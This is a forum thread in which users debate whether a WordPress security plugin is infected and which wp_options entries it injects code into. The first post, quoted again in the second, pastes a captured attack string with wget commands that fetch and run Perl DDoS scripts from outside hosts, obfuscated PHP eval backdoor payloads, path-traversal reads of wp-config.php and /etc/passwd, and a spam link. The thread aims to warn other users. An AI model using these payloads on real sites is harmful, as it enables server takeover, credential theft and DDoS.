12-06-2017, 07:47 PM
01-12-2018, 02:58 AM
This plugin is effected !!
http://cialis24h.party/#8746
http://free-games.top/tmp/db.php
http://shunceng.altervista.org/irc//dos.txt
http://suryaselindo.co.id//plugins/conte.../stats.txt
http://chel.bit-ecol.ru/wp-includes/ID3/robots
PHP Code:
download_backup_file=../wp-config.php, gform_unique_id=../../../../../,cmd=wget http://shunceng.altervista.org/irc//dos.txt ;lwp-download http://shunceng.altervista.org/irc//dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl ddos.txt ; rm -rf dos.*, shxxx=cd /tmp;wget http://chel.bit-ecol.ru/wp-includes/ID3/robots;perl robots;perl robots;perl robots;perl robots;perl robots;rm -rf robo*,cmd=wget http://suryaselindo.co.id//plugins/content/multithumb/stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; rm -rf stats*,form_id=../../, upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,message=d <a href="http://cialis24h.party/#8746">buy cialis online safely</a> buy cialis online uk, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php, mdocs-img-preview=../../..-/wp-config.php, data=../../..-/wp-config.php,coco=@eval(base64_decode($_POST[z0]));,filename=../../../../../../../../../etc/passwd,q071238=echo '%%%' . 'q071238' . '%%%';, calendar_id=../../../../wp-config.php,id=../../../../../../wp-config.php, src=http://free-games.top/tmp/db.php,q=/wp-config.php~,coco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,coco=@, coco=eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));, z=@eval/**/(${\'_P\'.\'OST\'}[z9]/**/(${\'_POS\'.\'T\'}[z0]));, gform_unique_id=../../../, file=/path/wp-config.php, bot=eval("echo 10000000000-245205634;");, uploader_dir=./UmpSiX, uploader_dir=DbtXLd, uploader_dir=./ADLAyD, uploader_dir=./DVwEgu, uploader_dir=./gWAlvS, file_path=../../../../wp-config.php,bot=eval("echo 10000000000-245205634;");, fname=../../wp-config.php, chdir=./";}
http://cialis24h.party/#8746
http://free-games.top/tmp/db.php
http://shunceng.altervista.org/irc//dos.txt
http://suryaselindo.co.id//plugins/conte.../stats.txt
http://chel.bit-ecol.ru/wp-includes/ID3/robots
01-12-2018, 03:52 AM
(01-12-2018 02:58 AM)CreativeMedia Wrote: [ -> ]This plugin is effected !!
PHP Code:
download_backup_file=../wp-config.php, gform_unique_id=../../../../../,cmd=wget http://shunceng.altervista.org/irc//dos.txt ;lwp-download http://shunceng.altervista.org/irc//dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl ddos.txt ; rm -rf dos.*, shxxx=cd /tmp;wget http://chel.bit-ecol.ru/wp-includes/ID3/robots;perl robots;perl robots;perl robots;perl robots;perl robots;rm -rf robo*,cmd=wget http://suryaselindo.co.id//plugins/content/multithumb/stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; rm -rf stats*,form_id=../../, upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,message=d <a href="http://cialis24h.party/#8746">buy cialis online safely</a> buy cialis online uk, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php, mdocs-img-preview=../../..-/wp-config.php, data=../../..-/wp-config.php,coco=@eval(base64_decode($_POST[z0]));,filename=../../../../../../../../../etc/passwd,q071238=echo '%%%' . 'q071238' . '%%%';, calendar_id=../../../../wp-config.php,id=../../../../../../wp-config.php, src=http://free-games.top/tmp/db.php,q=/wp-config.php~,coco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,coco=@, coco=eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));, z=@eval/**/(${\'_P\'.\'OST\'}[z9]/**/(${\'_POS\'.\'T\'}[z0]));, gform_unique_id=../../../, file=/path/wp-config.php, bot=eval("echo 10000000000-245205634;");, uploader_dir=./UmpSiX, uploader_dir=DbtXLd, uploader_dir=./ADLAyD, uploader_dir=./DVwEgu, uploader_dir=./gWAlvS, file_path=../../../../wp-config.php,bot=eval("echo 10000000000-245205634;");, fname=../../wp-config.php, chdir=./";}
http://cialis24h.party/#8746
http://free-games.top/tmp/db.php
http://shunceng.altervista.org/irc//dos.txt
http://suryaselindo.co.id//plugins/conte.../stats.txt
http://chel.bit-ecol.ru/wp-includes/ID3/robots
Give me a proof about that on my file. Thanks
01-12-2018, 03:58 AM
Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messages
I have all your plugins on my desk and I will check them all. If I found them affected too then you are doomed *(
I have all your plugins on my desk and I will check them all. If I found them affected too then you are doomed *(
01-12-2018, 04:09 AM
thanks for this! reps added
01-12-2018, 06:16 AM
(01-12-2018 03:58 AM)CreativeMedia Wrote: [ -> ]Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messagesI did and found 0 matches. Try and clean that stuff and reactivate the plugin. It's not it!
01-12-2018, 09:19 AM
(01-12-2018 06:16 AM)bale Wrote: [ -> ](01-12-2018 03:58 AM)CreativeMedia Wrote: [ -> ]Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messagesI did and found 0 matches. Try and clean that stuff and reactivate the plugin. It's not it!
This plugin is creating two tables at `wp_options` and injecting code into them.
PHP Code:
pp_important_messages
trust_network_rules
01-12-2018, 03:10 PM
(01-12-2018 09:19 AM)CreativeMedia Wrote: [ -> ](01-12-2018 06:16 AM)bale Wrote: [ -> ](01-12-2018 03:58 AM)CreativeMedia Wrote: [ -> ]Try to install it on your website and check your database by searching for: trust_network_rules or pp_important_messagesI did and found 0 matches. Try and clean that stuff and reactivate the plugin. It's not it!
This plugin is creating two tables at `wp_options` and injecting code into them.
PHP Code:
pp_important_messages
trust_network_rules
YOU ARE RIGHT. I TAKE MY WORDS BACK. Maybe someone with a purchased version can help to compare these.
LATER EDIT:
Manage to get a few purchased copies and its 100% something at their end. Not Chupach's fault.
01-13-2018, 03:34 PM
I will stop update for this plugin and report this bullsh!t to Envato soon.
01-13-2018, 04:13 PM
Someone commented on their codecanyon page. I'm curious how they respond considering they sell a security plugin.